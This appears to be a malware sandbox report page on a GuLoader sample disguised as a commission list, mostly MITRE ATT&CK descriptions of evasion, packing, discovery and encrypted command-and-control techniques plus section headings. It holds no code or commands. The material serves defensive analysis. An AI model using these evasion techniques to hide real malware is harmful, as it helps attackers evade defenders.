Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report June-July_Commission_List_Summary-2021.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: June-July_Commission_List_Summary-2021.exe PID: 1308 Parent PID: 5580

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: June-July_Commission_List_Summary-2021.exe PID: 1308 Parent PID: 5580 June-July_Commission_List_Summary-2021.exeCOMMON

Function 0042CD3C, Relevance: 286.6, APIs: 154, Strings: 9, Instructions: 1341
COMMON

Function 004015BC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134
COMMON